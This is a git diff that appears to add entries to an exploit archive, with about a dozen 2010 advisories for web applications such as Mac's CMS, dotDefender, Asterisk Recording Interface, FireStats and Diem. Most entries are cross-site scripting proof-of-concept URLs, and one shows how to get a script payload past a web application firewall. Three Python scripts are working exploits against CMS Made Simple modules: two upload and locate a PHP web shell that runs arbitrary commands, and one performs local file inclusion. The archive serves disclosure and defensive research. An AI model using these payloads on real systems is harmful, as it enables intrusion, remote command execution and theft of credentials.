diff --git a/files.csv b/files.csv index 5427c961e..d5f4322b9 100755 --- a/files.csv +++ b/files.csv @@ -30880,3 +30880,16 @@ id,file,description,date,author,platform,type,port 34286,platforms/php/webapps/34286.txt,"SimpNews 2.47.3 Multiple Cross Site Scripting Vulnerabilities",2010-07-09,MustLive,php,webapps,0 34287,platforms/php/webapps/34287.txt,"Yappa 3.1.2 'yappa.php' Multiple Remote Command Execution Vulnerabilities",2010-07-09,"Sn!pEr.S!Te Hacker",php,webapps,0 34288,platforms/php/webapps/34288.txt,"pragmaMX 0.1.11 'modules.php' Multiple SQL Injection Vulnerabilities",2009-12-22,"Hadi Kiamarsi",php,webapps,0 +34290,platforms/java/webapps/34290.txt,"Mac's CMS 1.1.4 'searchString' Parameter Cross Site Scripting Vulnerability",2010-07-11,10n1z3d,java,webapps,0 +34291,platforms/php/webapps/34291.txt,"Joomla! Rapid-Recipe Component HTML Injection Vulnerability",2010-07-10,Sid3^effects,php,webapps,0 +34292,platforms/php/webapps/34292.txt,"eliteCMS 1.01 Multiple Cross Site Scripting Vulnerabilities",2010-07-10,10n1z3d,php,webapps,0 +34293,platforms/java/webapps/34293.txt,"dotDefender 4.02 'clave' Parameter Cross Site Scripting Vulnerability",2010-07-12,"David K",java,webapps,0 +34294,platforms/php/webapps/34294.txt,"FireStats 1.6.5 Multiple Cross Site Scripting Vulnerabilities",2010-07-09,"Jelmer de Hen",php,webapps,0 +34295,platforms/php/webapps/34295.txt,"RunCms 2.1 'magpie_debug.php' Cross Site Scripting Vulnerability",2010-07-11,"John Leitch",php,webapps,0 +34296,platforms/php/webapps/34296.txt,"CSSTidy 1.3 'css_optimiser.php' Cross Site Scripting Vulnerability",2010-07-11,"John Leitch",php,webapps,0 +34297,platforms/multiple/remote/34297.txt,"dotDefender Cross-Site Scripting Security Bypass Vulnerability",2010-07-09,SH4V,multiple,remote,0 +34298,platforms/php/webapps/34298.py,"CMS Made Simple Download Manager 1.4.1 Module Arbitrary File Upload Vulnerability",2010-07-11,"John Leitch",php,webapps,0 +34299,platforms/php/webapps/34299.py,"CMS Made Simple 1.8 'default_cms_lang' Parameter Local File Include Vulnerability",2010-07-11,"John Leitch",php,webapps,0 +34300,platforms/php/webapps/34300.py,"CMS Made Simple Antz Toolkit 1.02 Module Arbitrary File Upload Vulnerability",2010-07-11,"John Leitch",php,webapps,0 +34301,platforms/multiple/remote/34301.txt,"Asterisk Recording Interface 0.7.15/0.10 Multiple Vulnerabilities",2010-07-12,TurboBorland,multiple,remote,0 +34302,platforms/php/webapps/34302.txt,"Diem 5.1.2 Multiple Cross Site Scripting Vulnerabilities",2010-07-13,"High-Tech Bridge SA",php,webapps,0 diff --git a/platforms/java/webapps/34290.txt b/platforms/java/webapps/34290.txt new file mode 100755 index 000000000..c9ed3c175 --- /dev/null +++ b/platforms/java/webapps/34290.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/41529/info + +Mac's CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +Mac's CMS 1.1.4 is vulnerable; other versions may also be affected. + +http://www.example.com/index.php/footer/search?searchString='> \ No newline at end of file diff --git a/platforms/java/webapps/34293.txt b/platforms/java/webapps/34293.txt new file mode 100755 index 000000000..45a3d12c3 --- /dev/null +++ b/platforms/java/webapps/34293.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/41541/info + +dotDefender is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +dotDefender 4.02 is vulnerable; other versions may also be affected. + +The following example URI is available: + +http://www.example.com/oportunidades/presencial/buscador/sinresultado/?&idPais=3&clave=%3Cimg%20src=%22WTF%22%20onError=%22{ \ No newline at end of file diff --git a/platforms/multiple/remote/34297.txt b/platforms/multiple/remote/34297.txt new file mode 100755 index 000000000..f0169bfe7 --- /dev/null +++ b/platforms/multiple/remote/34297.txt @@ -0,0 +1,23 @@ +source: http://www.securityfocus.com/bid/41560/info + +dotDefender is prone to a security-bypass vulnerability because it fails to restrict malicious data from reaching protected sites. + +Remote attackers can exploit this issue to bypass security restrictions and to launch cross-site scripting attacks. + + //POST + + //GET + +EXAMPLES: + +Blocked: +http://www.example.com/search?q=%3Cimg%20src=%22WTF%22%20onError=%22{var%20{3:s,2:h,5:a,0:v,4:n,1:e}=%27earltv%27}[self][0][v%2Ba%2Be%2Bs]%28e%2Bs%2Bv%2Bh%2Bn%29%28/0wn3d/.source%29%22%20/%3E + +Unblocked: +http://www.example.com/search?q=%3Cimg%20src=%22WTF%22%20onError=alert(/0wn3d/.source)%20/%3E diff --git a/platforms/multiple/remote/34301.txt b/platforms/multiple/remote/34301.txt new file mode 100755 index 000000000..b08a97b06 --- /dev/null +++ b/platforms/multiple/remote/34301.txt @@ -0,0 +1,16 @@ +source: http://www.securityfocus.com/bid/41571/info + +The Asterisk Recording Interface is prone to the following issues: + +1. Multiple security bypass vulnerabilities. +2. A cross-site request-forgery vulnerability. +3. A cross-site scripting vulnerability. + +Attackers can exploit these issues to steal cookie-based authentication credentials, gain unauthorized access to the application, bypass certain security restrictions, disclose sensitive information, or cause denial-of-service conditions. + +The following example URIs are available: + +http://www.example.com/recordings/index.php?m=Voicemail&f=msgAction&a=forward_to&q=&folder=&start=0&span=15&order=calldate&sort=desc&folder_rx=&mailbox_rx=houston%2F2627&selected7=/var/www/recordings/index.php + +http://www.example.com/recordings/index.php?m=Voicemail&f=msgAction&a=forward_to&q=&folder=INBOX&start=0&span=15&order=calldate&sort=desc&folder_rx=&mailbox_rx=houston%2F4949&selected7=%2Fvar%2Fspool%2Fasterisk%2Fvoicemail%2Fhouston%2F2625%2FINBOX%2Fmsg0000.txt + diff --git a/platforms/php/webapps/34291.txt b/platforms/php/webapps/34291.txt new file mode 100755 index 000000000..cd2704acc --- /dev/null +++ b/platforms/php/webapps/34291.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/41531/info + +Joomla! Rapid-Recipe component is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +The following example input is available: + +">>

XSS3d By Sid3^effects

\ No newline at end of file diff --git a/platforms/php/webapps/34292.txt b/platforms/php/webapps/34292.txt new file mode 100755 index 000000000..ac898122e --- /dev/null +++ b/platforms/php/webapps/34292.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/41537/info + +eliteCMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +eliteCMS 1.01 is vulnerable; other versions may also be affected. + +The following example URIs are available: + +http://www.example.com/admin/edit_page.php?page=1[XSS] +http://www.example.com/admin/edit_post.php?page=1[XSS] +http://www.example.com/admin/add_post.php?page=1[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/34294.txt b/platforms/php/webapps/34294.txt new file mode 100755 index 000000000..a08db8bb6 --- /dev/null +++ b/platforms/php/webapps/34294.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/41548/info + +FireStats is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +FireStats 1.6.5 is vulnerable; other versions may be affected. + +http://www.example.com/wp-content/plugins/firestats/php/window-add-excluded-ip.php?edit=%3Cscript%3Ealert%28123%29%3C/script%3E +http://www.example.com/wp-content/plugins/firestats/php/window-add-excluded-url.php?edit=%3Cscript%3Ealert%28123%29%3C/script%3E +http://www.example.com/wp-content/plugins/firestats/php/window-new-edit-site.php?site_id=%27%20onmousemove=alert%28123%29;%20style=width:900;height:900;%20a= diff --git a/platforms/php/webapps/34295.txt b/platforms/php/webapps/34295.txt new file mode 100755 index 000000000..05c00a712 --- /dev/null +++ b/platforms/php/webapps/34295.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/41551/info + +RunCms is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +RunCms 2.1 is vulnerable; other versions may also be affected. + +http://www.example.com/runcms2.1/modules/headlines/magpierss/scripts/magpie_debug.php?url=%3Cscript%3Ealert(0)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/34296.txt b/platforms/php/webapps/34296.txt new file mode 100755 index 000000000..0b946a4e1 --- /dev/null +++ b/platforms/php/webapps/34296.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/41552/info + +CSSTidy is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. ImpressCMS versions that use the vulnerable application are also affected. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +CSSTidy 1.3 and ImpressCMS 1.2.1 are vulnerable; other versions may also be affected. + +http://localhost/impresscms/plugins/csstidy/css_optimiser.php?url=%22%3E%3Cscript%3Ealert(0)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/34298.py b/platforms/php/webapps/34298.py new file mode 100755 index 000000000..c39030b3a --- /dev/null +++ b/platforms/php/webapps/34298.py @@ -0,0 +1,59 @@ +source: http://www.securityfocus.com/bid/41564/info + +The Download Manager module for CMS Made Simple is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input. + +An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. + +Download Manager version 1.4.1 is vulnerable; other versions may also be affected. + +import socket, re + +host = 'localhost' +path = '/cmsms' +port = 80 + +def upload_shell(): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((host, port)) + s.settimeout(8) + + s.send('POST ' + path + '/modules/DownloadManager/lib/simple-upload/example.php HTTP/1.1\r\n' + 'Host: localhost\r\n' + 'Proxy-Connection: keep-alive\r\n' + 'User-Agent: x\r\n' + 'Content-Length: 189\r\n' + 'Cache-Control: max-age=0\r\n' + 'Origin: null\r\n' + 'Content-Type: multipart/form-data; boundary=----x\r\n' + 'Accept: text/html\r\n' + 'Accept-Encoding: gzip,deflate,sdch\r\n' + 'Accept-Language: en-US,en;q=0.8\r\n' + 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n' + '\r\n' + '------x\r\n' + 'Content-Disposition: form-data; name="file"; filename="shell.php"\r\n' + 'Content-Type: application/octet-stream\r\n' + '\r\n' + '\' + system($_GET[\'CMD\']) + \'\'; ?>\r\n' + '------x--\r\n' + '\r\n') + + resp = s.recv(8192) + + http_ok = 'HTTP/1.1 200 OK' + + if http_ok not in resp[:len(http_ok)]: + print 'error uploading shell' + return + else: print 'shell uploaded' + + shell_path = path + '/modules/DownloadManager/lib/simple-upload/'\ + + re.search(u'shell_[^.]+\.php', resp).group(0) + + s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\ + 'Host: ' + host + '\r\n\r\n') + + if http_ok not in s.recv(8192)[:len(http_ok)]: print 'shell not found' + else: print 'shell located at http://' + host + shell_path + +upload_shell() diff --git a/platforms/php/webapps/34299.py b/platforms/php/webapps/34299.py new file mode 100755 index 000000000..6cbb8f8b8 --- /dev/null +++ b/platforms/php/webapps/34299.py @@ -0,0 +1,40 @@ +source: http://www.securityfocus.com/bid/41565/info + +CMS Made Simple is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. + +An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible. + +# ------------------------------------------------------------------------ +# Software................CMS Made Simple 1.8 +# Vulnerability...........Local File Inclusion +# Download................http://www.cmsmadesimple.org/ +# Release Date............7/11/2010 +# Tested On...............Windows Vista + XAMPP +# ------------------------------------------------------------------------ +# Author..................John Leitch +# Site....................http://cross-site-scripting.blogspot.com/ +# Email...................john.leitch5@gmail.com +# ------------------------------------------------------------------------ +# +# --Description-- +# +# A local file inclusion vulnerability in CMS Made Simple 1.8 can be +# exploited to include arbitrary files. +# +# +# --PoC-- +import httplib, urllib + +host = 'localhost' +path = '/cmsms' + +lfi = '../' * 32 + 'windows/win.ini\x00' + +c = httplib.HTTPConnection(host) +c.request('POST', path + '/admin/addbookmark.php', + urllib.urlencode({ 'default_cms_lang': lfi }), + { 'Content-type': 'application/x-www-form-urlencoded' }) +r = c.getresponse() + +print r.status, r.reason +print r.read() diff --git a/platforms/php/webapps/34300.py b/platforms/php/webapps/34300.py new file mode 100755 index 000000000..9252b6e43 --- /dev/null +++ b/platforms/php/webapps/34300.py @@ -0,0 +1,75 @@ +source: http://www.securityfocus.com/bid/41569/info + +The Antz toolkit module for CMS Made Simple is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input. + +An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. + +Antz toolkit 1.02 is vulnerable; other versions may also be affected. + +import socket + +host = 'localhost' +path = '/cmsms' +port = 80 + +def upload_shell(): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((host, port)) + s.settimeout(8) + + s.send('POST ' + path + '/include.php HTTP/1.1\r\n' + 'Host: localhost\r\n' + 'Proxy-Connection: keep-alive\r\n' + 'User-Agent: x\r\n' + 'Content-Length: 257\r\n' + 'Cache-Control: max-age=0\r\n' + 'Origin: null\r\n' + 'Content-Type: multipart/form-data; boundary=----x\r\n' + 'Accept: text/html\r\n' + 'Accept-Encoding: gzip,deflate,sdch\r\n' + 'Accept-Language: en-US,en;q=0.8\r\n' + 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n' + '\r\n' + '------x\r\n' + 'Content-Disposition: form-data; name="antzSeed"\r\n' + '\r\n' + '\r\n' + '------x\r\n' + 'Content-Disposition: form-data; name="shell_file"; filename="shell.php"\r\n' + 'Content-Type: application/octet-stream\r\n' + '\r\n' + '\' + system($_GET[\'CMD\']) + \'\'; ?>\r\n' + '------x--\r\n' + '\r\n') + + resp = s.recv(8192) + + s.close() + + http_ok = 'HTTP/1.1 200 OK' + + if http_ok not in resp[:len(http_ok)]: + print 'error uploading shell' + return + else: print 'shell uploaded' + + print 'searching for shell' + + for i in range(0, 9999): + + shell_path = path + '/modules/antz/tmp/' + str(i) + 'shell.php' + + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((host, port)) + s.settimeout(8) + + s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\ + 'Host: ' + host + '\r\n\r\n') + + if http_ok in s.recv(8192)[:len(http_ok)]: + print '\r\nshell located at http://' + host + shell_path + break + else: + print '.', + +upload_shell() diff --git a/platforms/php/webapps/34302.txt b/platforms/php/webapps/34302.txt new file mode 100755 index 000000000..31f923704 --- /dev/null +++ b/platforms/php/webapps/34302.txt @@ -0,0 +1,22 @@ +source: http://www.securityfocus.com/bid/41587/info + +Diem is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Diem 5.1.2 is vulnerable; other versions may also be affected. + +http://www.example.com/admin.php/seo/pages/manage-pages/editField?dm_cpi=0&dm_xhr=1&value=title">' /> + + + + + + +